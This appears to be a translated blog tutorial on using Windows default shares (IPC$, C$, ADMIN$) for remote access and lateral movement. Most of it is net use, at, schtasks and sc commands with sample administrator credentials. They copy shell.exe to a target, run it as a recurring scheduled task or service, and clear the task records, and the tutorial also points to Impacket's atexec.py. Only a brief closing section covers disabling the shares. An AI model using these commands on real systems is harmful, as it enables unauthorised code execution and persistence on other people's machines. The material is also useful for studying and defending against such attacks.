Detailed explanation of the exploitation of Windows default shares

1. Introduction

In the Windows system, by right-clicking 'Manage' on 'My Computer' and then selecting 'System Tools→Shared Folders→Sharing' in turn, you will see some symbols marked with the dollar sign '$' which are the default shares of the Windows system, that is, the features automatically shared by Windows after installation

command line net share

IPC$ (Internet Process Connection) can be understood as a kind of “dedicated pipeline）（command pipeline, related to the server service），can establish a secure channel between both parties connected, and achieve access to the remote computer. While Windows NT/2000/XP provides the IPC$ feature, it also opens the default sharing when the system is initially installed, that is, all thelogical shares (C$, D$, E$……) and system directories (ADMIN$) sharing. The purpose of all these shared resources is to facilitate the management of administrators (Only administrators can perform remote operations on themHowever, whether intentionally or unintentionally, it has led to potential security risks in system security.

At the same time, Microsoft has said this: "The Server service needs to use the default IPC$ system management sharing. Therefore, you cannot delete this sharing. We recommend that you do not delete the system management sharing created by Windows for the root partition and volume (such as C$) and for the system root folder (ADMIN$). Deleting these folders may cause problems for administrators, programs, or services that depend on these shared resources. As long as the Server service "Server" is running, IPC$ cannot be deleted. Attempting to delete will only result in an "Access denied" error message. When you stop itServer serviceAfter that, IPC$ will disappear automatically.

All shared resources depend on ports 139 or 445

Secondly, common shared commands

View command

net use #View connections established on this machine (this machine connects to other machines)
net session #View connections established on this machine (connections from other machines), requires administrator user to execute

net share Command

net share View current enabled sharing

net share #View local shared resources
net share ipc$ #Enable ipc$ sharing
net share ipc$ /del #Delete ipc$ sharing
net share admin$ /del #Delete admin$ sharing
net share c$ /del #Delete C disk sharing
net share d$ /del #Delete D disk sharing
net share * /del #Delete all connections

Deleting this way, the computer will automatically open after restarting

net use Connection operation

net use \\192.168.10.15 #Establish an empty ipc connection with 192.168.10.15
net use \\192.168.10.15\ipc$ #Establish an empty ipc connection with 192.168.10.15
net use \\192.168.10.15\ipc$ /u:"" "" #Establish an empty ipc connection with 192.168.10.15

net view \\192.168.10.15 #View the default shares opened by the remote host

net use \\192.168.10.15 /u:"administrator" "root" #Establish an ipc connection with 192.168.10.15 as the administrator
net use \\192.168.10.15 /del #Delete the established ipc connection

Establish a shared connection using a domain account
net use \\192.168.10.15\c$ 域账户密码 /user:域名\域账户

net time \\192.168.10.15 #View the time on this host

net use \\192.168.10.15\c$ /u:"administrator" "root" #Establish a shared connection to the C drive
dir \\192.168.10.15\c$ #View the files on the C drive of 192.168.10.15
dir \\192.168.10.15\c$\user #View the user directory under the C drive of 192.168.10.15
dir \\192.168.10.15\c$\user\test.exe #View the test.exe file in the user directory under the C drive of 192.168.10.15
net use \\192.168.10.15\c$ /del #Delete this C drive shared connection

net use k: \\192.168.10.15\c$ /u:"administrator" "root" #Map the target C drive to the local K drive
net use k: /del #Delete this mapping

Establish an empty connection:

Source host:

An empty connection is useless, access is denied

Destination host:

3. Exploitation of IPC$

Refers to a non-empty connection

• Establishing an IPC$ connection with an administrator can execute all the following commands.
• Establishing an IPC$ connection with a normal user can only execute the 'view time' command: 'net time \192.168.10.131', and other commands cannot be executed.

Administrator group user ciby connection

Unable to access the c disk share

Administrator account connection

1. You can list the c$ directory and execute commands

2. File Management

You can also view the corresponding files and directories directly in the file management using the command: \192.168.2.130\c$, and you can also add, delete, modify, and query

3. tasklist command (View processes)

4. at command (Scheduled command, can反弹shell)

View the time on the target system: net time \\192.168.2.130

Copy the specified file in this directory to the target system: copy shell.exe \\192.168.2.130\c$

Create a scheduled task using at: at \\192.168.2.130 14:14:00 C:\shell.exe

Clear at records: at \\192.168.2.130 作业ID /delete

Execute using the at command, write the execution result to a local text file, and then view the content of the file using the type command: at \\192.168.2.130 14:23:00 cmd.exe /c "ipconfig > c:\1.txt"

View the generated 1.txt file: type \\192.168.10.131\C$\1.txt

5. schtasks (Scheduled Tasks)

The at command has been deprecated in operating systems from Windows Vista and Windows Server 2008 onwards, and has been replaced by the schtasks command. The schtasks command is more flexible than the at command. When using the schtasks command, a log file is left in the system: C:\Windows\Tasks\SchedLgU.txt

Create a scheduled task named 'test' on the target host, with the program C:\shell.exe, starting with system privileges, and the task will start every minute.

schtasks /create /s 192.168.2.130 /u administrator /p 123.com /tn test /sc MINUTE /mo 1 /tr c:\shell.exe /ru administrator /f

Log manifestation:

schtasks /create /s 192.168.1.136 /u administrator /p password /tn c /tr c:\shell.exe /sc once /st 14:34

#/s Target /u Username /p Password /tn Specify filename /tr Specify file path /sc Execution count or frequency /st Start time

Other startup time parameters:

/sc onlogon Start when a user logs on

/sc onstart Start when the system starts

/sc onidle Start when the system is idle

Query this test scheduled task

schtasks /s 192.168.2.130 /u administrator /p 123.com /query | findstr test

Start this test scheduled task

schtasks /run /s 192.168.2.130 /u administrator /p 123.com /i /tn "test"

Delete this test scheduled task

schtasks /delete /s 192.168.2.130 /u administrator /p 123.com /tn "test" /f

6. Create a service using the sc command

copy test.exe \\192.168.10.20\c$

sc \\192.168.10.20 create test binpath= "c:\test.exe"

sc \\192.168.2.130 start test

View the created services

sc \\192.168.2.130 delete test

7. atexec.py in Impacket

The atexec.py script in Impacket is used to exploitScheduled tasksGet permissions, the exploitation of this script requires the ipc$ sharing to be enabled. This script only works on Windows >= Vista systems. This example can execute commands on the target host through the Task Scheduler and return the output after command execution.

Log display:

Enable TaskScheduler logs

4. Methods to close sharing

In addition to using the 'net share * /del' method to delete, there are many other ways, such as modifying the registry, disabling SERVER services, etc., and we can choose a way to stop the sharing ourselves.

Reference:

The 'net share' command lists the default shares on Windows (including the C drive) [easy to understand] - Tencent Cloud Developer Community - Tencent Cloud

Windows System Security | IPC$ sharing and other shared (C$, D$, Admin$) - Tencent Cloud Developer Community - Tencent Cloud

Detailed Explanation of Schtasks (Scheduled Tasks) Command - A Lazy Ghost's Blog - CSDN Blog

Four commonly used meterpreter trojan backdoors

Impacket Usage - ciyze0101 - Blog Garden

Impacket Scripting Guide (Part 1) - Xuanzhi Community

Turn off default sharing - Introduction to Windows default sharing - Tencent Cloud Developer Community - Tencent Cloud